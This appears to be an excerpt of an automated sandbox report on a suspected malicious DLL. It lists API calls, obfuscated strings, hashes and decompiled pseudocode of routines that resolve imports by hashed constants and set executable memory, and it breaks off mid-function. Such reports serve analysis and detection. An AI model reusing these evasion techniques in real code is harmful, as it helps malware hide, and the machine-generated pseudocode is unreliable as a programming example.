Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Event$ChangeCloseCreateErrorFindLastNotification
String ID:
API String ID: 3591070289-0
Opcode ID: 357e396392715ca423331bacd726f6343f18b476d32ec456ecc9ece84cadcc7e
Instruction ID: d9f750616927e1ded0856b01ee1043c0df7c74436fbc7980e29a289a45184b47
Opcode Fuzzy Hash: 357e396392715ca423331bacd726f6343f18b476d32ec456ecc9ece84cadcc7e
Instruction Fuzzy Hash: A6E092B6D44610B7E90017E0EC0EFEF3A1D9F0676BF044020FE09E4180E662658562F6

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD9E0, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 567COMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,?), ref: 6E1CDA9A

Strings

D)!n, xrefs: 6E1CE0BC
lady q, xrefs: 6E1CDA5E

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: MutexOpen
String ID: D)!n$lady q
API String ID: 2178833747-1405160738
Opcode ID: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction ID: 1bc4bf949b646c35aff6db1888c56c93069be65d1d764445c60b2660b67586d7
Opcode Fuzzy Hash: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction Fuzzy Hash: 0B32D272D006188FDB14CFBCC8497DDBBB2BB56304F254669E508E7680DB746A84EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEB80, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,0000305B,00000040,6E213F20), ref: 6E1CEC4F

Strings

@, xrefs: 6E1CEB86

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: a25c6fb6d26a8d2954ee0e4f80e1b4a328956a8a1cc0c6d384bbf94f93fc5871
Instruction ID: 6111f0856e84b3388856e41a49f7be335f8607ab7c1d29e501670aa77afd0ac7
Opcode Fuzzy Hash: a25c6fb6d26a8d2954ee0e4f80e1b4a328956a8a1cc0c6d384bbf94f93fc5871
Instruction Fuzzy Hash: 0291EAF25019088FCB08DFACC99AA9977E3FB87300B228619F61597B49CA345741FB74

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1C26FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E1C2797
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E1C27C0
GetACP.KERNEL32 ref: 6E1C27D5

Strings

OCP, xrefs: 6E1C2752
ACP, xrefs: 6E1C271C

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction ID: 6a82b90887316fca8b4cb2d7c3048d3d87564b215dc47deacd51467d488e84fd
Opcode Fuzzy Hash: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction Fuzzy Hash: 7521B636614B01EBD7548FE5C981A8773B7AB71F60B62A424E805D7104E736DDC1E362

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C1F54, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 6E1C2015
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2040
_wcschr.LIBVCRUNTIME ref: 6E1C20D4
_wcschr.LIBVCRUNTIME ref: 6E1C20E2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1C21A3

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: _wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 382274351-0
Opcode ID: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction ID: 3517e4ff7be574864180a2b71de8eed2a2bdcf54e00ecd8292d948e16f9db68b
Opcode Fuzzy Hash: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction Fuzzy Hash: AF712671640602ABE715DBB5CC44AEA73BDEF39F04F204429E509D7180EB78D9C5E662

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C28D3, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 6E1C29DF
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2A28
IsValidLocale.KERNEL32(?,00000001), ref: 6E1C2A37
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 6E1C2A7F
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E1C2A9E

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction ID: 6644c177a31310e35f06b32f7075e5e42f78061a9a6d98bf8d87bdb52f183715
Opcode Fuzzy Hash: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction Fuzzy Hash: 55517F71900A16ABEF50CFE5CC54AAE77B8BF39B00F145829E511E7180DB789981EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC9E0, Relevance: 2.6, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1AC9E0(intOrPtr __ecx, signed char __edx, void* __eflags) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v77;
				char _v87;
				char _v100;
				char _v112;
				char _v372;
				void* _t43;
				void* _t46;
				signed char _t47;
				intOrPtr _t52;
				void* _t60;
				signed char _t61;
				signed int _t68;
				signed int _t73;
				signed int _t89;
				signed char _t93;
				void* _t97;
				void* _t98;
				void* _t102;
				intOrPtr _t107;
				void* _t110;

				_t105 = __eflags;
				_t93 = __edx;
				_v28 = __ecx;
				E6E1B30E0(E6E19D780(__edx, __eflags,  &_v372),  &_v68, __eflags);
				_v24 = E6E1AC2F0();
				E6E1AC850( &_v24, 4,  &_v372);
				E6E1A8CF0(_v24, 0x20,  &_v68);
				_t43 = E6E1A6320("e7.\'<b?2Hrj",  &_v87);
				_t102 = _t98 + 0x24;
				E6E1B3B50( &_v44, _t105, _t43);
				_t97 = E6E1B3C40( &_v68);
				_t46 = E6E1B3C60( &_v68);
				if(_t97 == _t46) {
					_v20 = 0;
				} else {
					_t52 = _t46 + 0xfffffff4;
					_t107 = _t52;
					_v20 = 0;
					_v32 = _t52;
					while(1) {
						E6E1B31D0( &_v56, _t107, _t97);
						E6E1B2F20( &_v100, E6E1A6320("\"35$;v`u8-#(gzb+6Tr",  &_v77),  &_v56);
						_t102 = _t102 + 0x14;
						_t95 =  &_v112;
						E6E1B3C70( &_v100,  &_v112,  &_v44);
						E6E1B36E0( &_v100);
						_t60 = E6E1AEA40( &_v112, _t93, _t107);
						_t108 = _t60;
						if(_t60 == 0) {
							_t61 = E6E1AAC50(0);
							_t102 = _t102 + 4;
							_t73 = ((_t61 ^ 0x00000001) & 0x000000ff) + ((_t61 ^ 0x00000001) & 0x000000ff);
							__eflags = _t73;
						} else {
							L6E1B4130(_v28, _t93, _t108,  &_v112);
							_t73 = 2;
							_v20 = 1;
						}
						E6E1B36E0(_t95);
						_t68 = (_t73 & 0xffffff00 | _t73 == 0x00000000) & 0xffffff00 | _t73 != 0x00000000;
						_t89 =  &_v56;
						E6E1B36E0(_t89);
						_t110 = _v32 - _t97;
						_t93 = _t93 & 0xffffff00 | _t110 != 0x00000000;
						if(((_t89 & 0xffffff00 | _t110 == 0x00000000) ^ _t68) != 0) {
							goto L9;
						}
						_t97 = _t97 + 0xc;
						_t68 = (_t68 | _t93) ^ 0x00000001;
						_t112 = _t68;
						if(_t68 == 0) {
							continue;
						} else {
						}
						goto L9;
					}
				}
				L9:
				_t47 = E6E1994B0(_t112, 1, 0xff);
				E6E1B36E0( &_v44);
				E6E1B3960( &_v68);
				return _t68 & 0xffffff00 | ((_t47 ^ _v20) & _v20) != 0x00000000;
			}

0x6e1ac9e0
0x6e1ac9e0
0x6e1ac9ec
0x6e1aca03
0x6e1aca0d
0x6e1aca17
0x6e1aca25
0x6e1aca36
0x6e1aca3b
0x6e1aca42
0x6e1aca4e
0x6e1aca52
0x6e1aca59
0x6e1acb17
0x6e1aca5f
0x6e1aca5f
0x6e1aca5f
0x6e1aca62
0x6e1aca69
0x6e1aca70
0x6e1aca76
0x6e1aca92
0x6e1aca97
0x6e1acaa0
0x6e1acaa4
0x6e1acaab
0x6e1acab2
0x6e1acab7
0x6e1acab9
0x6e1acad2
0x6e1acad7
0x6e1acadf
0x6e1acadf
0x6e1acabb
0x6e1acabf
0x6e1acac4
0x6e1acacb
0x6e1acacb
0x6e1acae3
0x6e1acaed
0x6e1acaf0
0x6e1acaf3
0x6e1acafb
0x6e1acafd
0x6e1acb05
0x00000000
0x00000000
0x6e1acb07
0x6e1acb0c
0x6e1acb0c
0x6e1acb0f
0x00000000
0x00000000
0x6e1acb15
0x00000000
0x6e1acb0f
0x6e1aca70
0x6e1acb1e
0x6e1acb25
0x6e1acb3a
0x6e1acb42
0x6e1acb53

Strings

e7.'<b?2Hrj, xrefs: 6E1ACA31
"35$;v`u8-#(gzb+6Tr, xrefs: 6E1ACA7F

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "35$;v`u8-#(gzb+6Tr$e7.'<b?2Hrj
API String ID: 0-1733671778
Opcode ID: ddce3145eedeb1e503858861a36d314e20153e9e77e2a56d3dda75eae62b2ff9
Instruction ID: 7bae29c586e32c9e59ea5fae7b41195b7828e93d039fd295eac0d212e2e8c6ec
Opcode Fuzzy Hash: ddce3145eedeb1e503858861a36d314e20153e9e77e2a56d3dda75eae62b2ff9
Instruction Fuzzy Hash: B631F376E002196BCB00DBE4DC94AFF773DAF51348F040825DA156B280EB751A9AB7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A04E0, Relevance: 1.5, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A04E0(void* __edx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v84;
				char _v148;
				void* _t60;
				intOrPtr _t67;
				void* _t73;
				signed char _t74;
				void* _t79;
				void* _t80;
				signed int _t81;
				signed int _t83;
				signed int _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				char* _t103;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t110;
				void* _t112;
				intOrPtr* _t114;
				signed char* _t115;
				intOrPtr* _t116;
				void* _t117;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t128;
				void* _t131;

				_t105 = __edx;
				_t106 = _a4;
				_t60 = E6E1AADC0(__eflags, _a4);
				_t123 = _t122 + 4;
				_t135 = _t60;
				if(_t60 == 0) {
					_t116 = 0;
					__eflags = 0;
					L24:
					return _t116;
				}
				_t117 = _t60;
				_v44 = E6E199090(_t135,  *((intOrPtr*)(_t117 + 0x24)),  ~_t106);
				_t94 = E6E199090(_t135,  *((intOrPtr*)(_t117 + 0x1c)), E6E194E30(0x8c18fbbc));
				_t67 = E6E191A10( *((intOrPtr*)(_t117 + 0x20)), _a4);
				_t127 = _t123 + 0x1c;
				_v52 = _t67;
				_t109 =  *((intOrPtr*)(_t117 + 0x18));
				_t116 = 0;
				if(_t109 == 0) {
					goto L24;
				}
				_t11 = _a4 - 0x1b823b1f; // -461519647
				_v40 = _t94 + _t11;
				_t95 = 0;
				_v48 = _t109;
				0;
				0;
				do {
					_t73 = E6E19E6F0(_t105, 0,  *((intOrPtr*)(_v52 + _t95 * 4)) + _a4, _a8);
					_t128 = _t127 + 8;
					_t138 = _t73;
					_t116 = 0;
					if(_t73 != 0) {
						L20:
						_t95 = _t95 + 1;
						_t110 = _v48;
						_v20 = _t95 - _t110 > 0;
						_t74 = E6E198BA0(_t116, 0);
						_t127 = _t128 + 8;
						if(((_t74 ^ _v20) & 0x00000001) != 0) {
							goto L24;
						}
						goto L21;
					}
					_v24 = _t95;
					_t78 = _a4;
					_t116 =  *((intOrPtr*)(_v40 + ( *(_v44 + _t95 * 2) & 0x0000ffff) * 4)) + _a4;
					_t79 = E6E1A0270(_a4);
					_t80 = E6E1AADC0(_t138, _t78);
					_t112 = _t80;
					_v20 = _t116 - _t80 >= 0;
					_t81 = E6E199090(_t116 - _t80, 0, _t79);
					_t128 = _t128 + 0x10;
					if((_t81 & 0xffffff00 | _t116 - _t112 - _t81 > 0x00000000) != _v20 || _t116 < _t112) {
						_t95 = _v24;
						goto L20;
					} else {
						_t101 =  *_t116;
						_t95 = _v24;
						if(_t101 != 0x2e) {
							_t83 = 0;
							__eflags = 0;
							while(1) {
								 *(_t121 + _t83 - 0x50) = _t101;
								__eflags = _t83 - 0x11;
								if(_t83 == 0x11) {
									goto L24;
								}
								_t101 =  *(_t116 + _t83 + 1) & 0x000000ff;
								__eflags = _t101;
								if(_t101 == 0) {
									goto L24;
								}
								_t83 = _t83 + 1;
								__eflags = _t101 - 0x2e;
								if(_t101 != 0x2e) {
									continue;
								}
								_t114 = _t116 + _t83;
								__eflags = _t114;
								L14:
								_v28 = 0x48;
								_v32 = 0x382d2364;
								_t41 =  &_v32; // 0x382d2364
								E6E1AFCC0(_t121 + _t83 - 0x50, _t41, 5);
								_t131 = _t128 + 0xc;
								_t86 =  *((intOrPtr*)(_t114 + 1));
								_t103 =  &_v148;
								if(_t86 == 0) {
									L18:
									 *_t103 = 0;
									_t88 = E6E19F060(_t105,  &_v84);
									_t128 = _t131 + 4;
									_t147 = _t88;
									if(_t88 != 0) {
										_t89 = E6E1A04E0(_t105, _t147, _t88,  &_v148);
										_t128 = _t128 + 8;
										_t116 = _t89;
										0;
										0;
									}
									goto L20;
								}
								_v36 = _t116;
								_t115 = _t114 + 2;
								_t119 = 0;
								0;
								do {
									_t97 = _t119;
									 *(_t121 + _t119 - 0x90) = _t86;
									_t47 = _t119 + 0x1dc19edd; // 0x1dc19edd
									_v20 = E6E191A10(_t47, 1);
									_t119 = E6E194E30(0x8a5b5e7e) + _v20;
									E6E191A10(_t97, 1);
									_t131 = _t131 + 0x14;
									_t86 =  *_t115 & 0x000000ff;
									_t115 =  &(_t115[1]);
								} while (_t86 != 0);
								_t103 = _t121 + _t119 - 0x90;
								_t116 = _v36;
								_t95 = _v24;
								goto L18;
							}
							goto L24;
						}
						_t83 = 0;
						_t114 = _t116;
						goto L14;
					}
					L21:
				} while (_t95 < _t110);
				goto L24;
			}

0x6e1a04e0
0x6e1a04ec
0x6e1a04f0
0x6e1a04f5
0x6e1a04f8
0x6e1a04fa
0x6e1a0706
0x6e1a0706
0x6e1a0708
0x6e1a0714
0x6e1a0714
0x6e1a0500
0x6e1a0512
0x6e1a0532
0x6e1a0538
0x6e1a053d
0x6e1a0540
0x6e1a0543
0x6e1a0548
0x6e1a054d
0x00000000
0x00000000
0x6e1a0556
0x6e1a055d
0x6e1a0560
0x6e1a0562
0x6e1a056b
0x6e1a056f
0x6e1a0570
0x6e1a057d
0x6e1a0582
0x6e1a0585
0x6e1a0587
0x6e1a058c
0x6e1a06e0
0x6e1a06e0
0x6e1a06e1
0x6e1a06e6
0x6e1a06ed
0x6e1a06f2
0x6e1a06fa
0x00000000
0x00000000
0x00000000
0x6e1a06fa
0x6e1a0595
0x6e1a05a2
0x6e1a05a7
0x6e1a05aa
0x6e1a05b5
0x6e1a05bd
0x6e1a05c1
0x6e1a05c8
0x6e1a05cd
0x6e1a05dc
0x6e1a05f2
0x00000000
0x6e1a05e2
0x6e1a05e2
0x6e1a05e7
0x6e1a05ea
0x6e1a05fa
0x6e1a05fa
0x6e1a0600
0x6e1a0600
0x6e1a0604
0x6e1a0607
0x00000000
0x00000000
0x6e1a060d
0x6e1a0612
0x6e1a0614
0x00000000
0x00000000
0x6e1a061a
0x6e1a061b
0x6e1a061e
0x00000000
0x00000000
0x6e1a0622
0x6e1a0622
0x6e1a0624
0x6e1a0624
0x6e1a0628
0x6e1a0635
0x6e1a063a
0x6e1a063f
0x6e1a0642
0x6e1a0647
0x6e1a064d
0x6e1a06af
0x6e1a06af
0x6e1a06b6
0x6e1a06bb
0x6e1a06be
0x6e1a06c0
0x6e1a06ca
0x6e1a06cf
0x6e1a06d2
0x6e1a06da
0x6e1a06de
0x6e1a06de
0x00000000
0x6e1a06c0
0x6e1a064f
0x6e1a0652
0x6e1a0655
0x6e1a065d
0x6e1a0660
0x6e1a0660
0x6e1a0662
0x6e1a0669
0x6e1a067a
0x6e1a068c
0x6e1a0692
0x6e1a0697
0x6e1a069a
0x6e1a069d
0x6e1a069e
0x6e1a06a2
0x6e1a06a9
0x6e1a06ac
0x00000000
0x6e1a06ac
0x00000000
0x6e1a0600
0x6e1a05ec
0x6e1a05ee
0x00000000
0x6e1a05ee
0x6e1a06fc
0x6e1a06fc
0x00000000

Strings

d#-8H, xrefs: 6E1A0635, 6E1A0638

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: d#-8H
API String ID: 0-1192920746
Opcode ID: c22cb983fb122f41e3abd86b71f8e2baa85fe868a1c6b950f06aa93e716a01cf
Instruction ID: 6d35431067a335651f87bd38ea84520ddf692f6f3f90f79282c800a32da07f1f
Opcode Fuzzy Hash: c22cb983fb122f41e3abd86b71f8e2baa85fe868a1c6b950f06aa93e716a01cf
Instruction Fuzzy Hash: 545106BAD102545BDB50CFF8DC40BFE7BF8AF15218F190524DA98A7201F7319D94A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9DA0, Relevance: .4, Instructions: 414
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6E1A9DA0(void* __eflags, signed int _a4) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				void* _t129;
				signed int _t136;
				void* _t140;
				signed int _t141;
				signed char _t142;
				intOrPtr _t147;
				signed int _t148;
				signed int _t157;
				signed int _t159;
				signed char _t165;
				signed int _t171;
				signed int _t172;
				signed int _t174;
				void* _t176;
				signed int _t178;
				signed char _t180;
				signed char _t183;
				intOrPtr _t188;
				void* _t189;
				signed char _t192;
				signed char _t196;
				intOrPtr* _t201;
				intOrPtr* _t203;
				signed int _t206;
				intOrPtr _t209;
				void* _t212;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed char _t224;
				signed char _t225;
				signed int _t230;
				signed int _t231;
				signed char _t232;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				signed int _t246;
				signed int _t247;
				signed char _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				intOrPtr _t260;
				signed int _t265;
				signed char _t266;
				signed int _t267;
				signed char _t270;
				signed int _t273;
				void* _t274;
				void* _t276;
				void* _t281;
				void* _t287;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t301;
				void* _t302;

				_t249 = _a4;
				_t2 = _t249 + 0x1c; // 0x89c1940f
				_t129 = E6E194740(__eflags,  *_t2 ^ 0xffffffef,  *_t2);
				E6E194E30(0x68653f4d);
				_t276 = _t274 + 0xc;
				_t306 = _t129;
				if(_t129 != 0) {
					E6E1AFCC0( &_v60, _t249, 0x20);
					_t206 = E6E192880(_t306, 0xffffffef, 0xffffffff);
					_t301 = _t276 + 0x14;
					_v32 = (_t206 ^ _v32) & _v32;
					_t6 = _t249 + 0x10; // 0xd5f5e8
					_t209 =  *_t6;
					if(_t209 == 0) {
						L5:
						 *(_t249 + 0x14) = 0;
						 *(_t249 + 0x18) = 0;
						L6:
						return 0;
					}
					_t230 = 0;
					0;
					0;
					0;
					while(1) {
						_t7 = _t249 + 0xc; // 0x875ffe5
						_v48 =  *_t7 + _t230;
						_v44 = _t209 - _t230;
						_t212 = E6E1A9DA0(0,  &_v60);
						_t302 = _t301 + 4;
						_t309 = _t212;
						if(_t212 != 0) {
							break;
						}
						_t273 =  ~(E6E191A10(E6E199090(_t309, 0, _t230), 0xffffffff));
						E6E191A10(_t230, 1);
						_t301 = _t302 + 0x18;
						_t11 = _t249 + 0x10; // 0xd5f5e8
						_t209 =  *_t11;
						_t230 = _t273;
						if(_t209 > _t273) {
							continue;
						}
						goto L5;
					}
					 *(_t249 + 0x18) = _v36 + _t230;
					 *(_t249 + 0x14) = _t230;
					return 1;
				}
				 *(_t249 + 0x14) = 0;
				_t15 = _t249 + 8; // 0x89559090
				_t219 =  *_t15;
				__eflags = _t219;
				_t231 = _t249;
				if(_t219 == 0) {
					_t257 = 0;
					__eflags = 0;
				} else {
					_t251 = 0;
					do {
						_v20 = 0;
						_t21 = _t231 + 4; // 0x90c35d5f
						_t260 =  *_t21;
						_t136 =  *(_t260 + _t251) & 0x000000ff;
						__eflags = _t136 -  *_t231;
						if(_t136 ==  *_t231) {
							_t220 = _v20;
							_t17 = _t231 + 0x10; // 0xd5f5e8
							__eflags = _t220 -  *_t17;
							if(_t220 ==  *_t17) {
								 *(_t231 + 0x18) = _t220;
								goto L6;
							}
							goto L10;
						} else {
							_t23 = _t231 + 1; // 0x5f5e24c4
							_t245 =  *_t23 & 0x000000ff;
							__eflags = _t136 - _t245;
							if(_t136 == _t245) {
								_v28 = _t245;
								_t89 = _t251 + 1; // -4184296802
								_t141 = _t89;
								while(1) {
									_v24 = _t141;
									_t142 = E6E191780(_t245, _t141, _t219);
									_t276 = _t276 + 8;
									__eflags = _t142 & 0x00000001;
									if((_t142 & 0x00000001) == 0) {
										break;
									}
									_t251 = _t251 + 1;
									_t238 = _v24;
									_t141 = _t238 + 1;
									_t245 = _v28 & 0x000000ff;
									__eflags =  *((intOrPtr*)(_t260 + _t238)) - (_v28 & 0x000000ff);
									if( *((intOrPtr*)(_t260 + _t238)) == (_v28 & 0x000000ff)) {
										continue;
									}
									break;
								}
								__eflags = _t219 - _v24;
								if(_t219 != _v24) {
									_t222 = _a4;
									E6E1AFCC0( &_v60, _a4, 0x20);
									_v56 = _v56 + _v24;
									_t147 = E6E191A10(_v52,  ~_v24);
									_t281 = _t276 + 0x14;
									_v52 = _t147;
									_t148 = _v20;
									 *((intOrPtr*)(_t222 + 0x18)) = _t148;
									_t112 = _t222 + 0x10; // 0xd5f5e8
									_t262 =  *_t112;
									__eflags =  *_t112 - _t148;
									if(__eflags <= 0) {
										goto L6;
									}
									_t234 = _t222;
									_t223 = _v20;
									while(1) {
										_t114 = _t234 + 0xc; // 0x875ffe5
										_v48 =  *_t114 + _t223;
										_v44 = E6E199090(__eflags, _t262 + 0x7133abf9, _t223) + 0x8ecc5407;
										_v20 = E6E1A9DA0(__eflags,  &_v60);
										_t157 = E6E191A10( ~_v36,  ~_t223);
										E6E191A10(_v36, _t223);
										_t159 = _a4;
										_t265 = _t159;
										 *(_t159 + 0x18) =  ~_t157;
										_t255 = E6E199090(__eflags, 0,  !_t223);
										E6E191A10(_t223, 1);
										_t287 = _t281 + 0x2c;
										__eflags = _v20;
										if(_v20 != 0) {
											break;
										}
										_t123 = _t265 + 0x10; // 0xd5f5e8
										_t262 =  *_t123;
										_t165 = E6E191480( *_t123, _t255);
										_t281 = _t287 + 8;
										__eflags = _t165 & 0x00000001;
										_t223 = _t255;
										_t234 = _a4;
										if(__eflags != 0) {
											continue;
										}
										goto L6;
									}
									return 1;
								}
								_t99 = _a4 + 0x10; // 0xd5f5e8
								 *((intOrPtr*)(_a4 + 0x18)) =  *_t99;
								return 1;
							}
							_t246 = _v20;
							_t25 = _t231 + 0x10; // 0xd5f5e8
							__eflags = _t246 -  *_t25;
							if(__eflags == 0) {
								 *(_t231 + 0x18) = _t246;
								goto L6;
							}
							_t266 = _t136;
							_t26 = _t231 + 0xc; // 0x875ffe5
							_t27 = _t231 + 0x1c; // 0x89c1940f
							_t224 =  *_t27;
							_v24 =  *( *_t26 + _t246) & 0x000000ff;
							_t171 = E6E194740(__eflags, _t224, 0xc);
							_t276 = _t276 + 8;
							__eflags = _t171;
							if(_t171 == 0) {
								_t225 = _t266;
								_t267 = _v20;
								_t172 = _v24;
								__eflags = _t225 - _t172;
								if(__eflags == 0) {
									goto L26;
								} else {
									goto L18;
								}
							} else {
								_t270 = _t266;
								__eflags = _t224 & 0x00000008;
								if(__eflags != 0) {
									_t225 = E6E1A4C90(__eflags, _t270);
									_t172 = E6E1A4C90(__eflags, _v24);
									_t276 = _t276 + 8;
								} else {
									_t201 = E6E1B09C0(1, E6E194E30(0x61557d5c));
									_t225 =  *_t201(_t270);
									_t203 = E6E1B09C0(1, 0x9304201);
									_t276 = _t276 + 0x14;
									_t172 =  *_t203(_v24);
								}
								_t267 = _v20;
								__eflags = _t225 - _t172;
								if(__eflags != 0) {
									L18:
									_v24 = _t172;
									_t39 = _a4 + 0x1c; // 0x89c1940f
									_v28 = _t225;
									_t174 = E6E192880(__eflags,  *_t39, 0xffffffff);
									_t176 = E6E192880(__eflags, E6E194E30(0xb94b1a64), 0xffffffff);
									_t178 = E6E1947E0(E6E194E30(0xb94b1a64), _t176);
									E6E194E30(0x68653f5f);
									_t180 = _v28;
									_t293 = _t276 + 0x24;
									__eflags = _t178 &  !_t174 & 0x00000002;
									if(__eflags == 0) {
										L37:
										 *((intOrPtr*)(_a4 + 0x18)) = _v20;
										goto L6;
									}
									_t183 = E6E192E20(__eflags, _t180 & 0x000000ff, 0xa);
									_t294 = _t293 + 8;
									_t247 = _v24;
									__eflags = _t247 - 0xd;
									_t241 = (_t231 & 0xffffff00 | _t247 == 0x0000000d) ^ _t183;
									__eflags = _t241 & 0x00000001;
									if((_t241 & 0x00000001) != 0) {
										L27:
										__eflags = _t247 - 0xa;
										_t248 = _v28;
										_t248 - 0xd = (_t183 & 0xffffff00 | _t247 == 0x0000000a) - (_t241 & 0xffffff00 | _t248 == 0x0000000d);
										if((_t183 & 0xffffff00 | _t247 == 0x0000000a) != (_t241 & 0xffffff00 | _t248 == 0x0000000d)) {
											goto L37;
										}
										__eflags = _t248 - 0xd;
										if(_t248 != 0xd) {
											goto L37;
										}
										_t251 = _t251 + 1;
										E6E191A10(_t251, 1);
										_t295 = _t294 + 8;
										_t70 = _a4 + 8; // 0x89559090
										__eflags = _t251 -  *_t70;
										if(_t251 >=  *_t70) {
											goto L37;
										}
										_t72 = _a4 + 4; // 0x90c35d5f
										_t188 =  *_t72;
										_t189 = E6E1999B0(0x57);
										_t276 = _t295 + 4;
										__eflags = ( *(_t188 + _t251) & 0x000000ff) - _t189;
										if(( *(_t188 + _t251) & 0x000000ff) != _t189) {
											goto L37;
										}
										_t220 = _v20;
										goto L10;
									} else {
										__eflags = _t183 & 0x00000001;
										if((_t183 & 0x00000001) == 0) {
											goto L27;
										} else {
											_t220 = _v20 + 1;
											_t54 = _a4 + 0x10; // 0xd5f5e8
											_t192 = E6E191780(_t247, _v20 + 1,  *_t54);
											_t296 = _t294 + 8;
											__eflags = _t192 & 0x00000001;
											if(__eflags == 0) {
												goto L37;
											}
											_t58 = _a4 + 0xc; // 0x875ffe5
											_t196 = E6E192E20(__eflags,  *( *_t58 + _t220) & 0x000000ff, 0xa);
											_t276 = _t296 + 8;
											__eflags = _t196 & 0x00000001;
											if((_t196 & 0x00000001) != 0) {
												goto L10;
											} else {
												goto L37;
											}
										}
									}
								} else {
									L26:
									_t220 = _t267;
									goto L10;
								}
							}
						}
						L36:
						return 1;
						L10:
						_t257 =  ~(E6E191A10( ~_t220, 0xffffffff));
						_t140 = E6E191A10(E6E199090(__eflags, _t251, 0xf9674d63), 1);
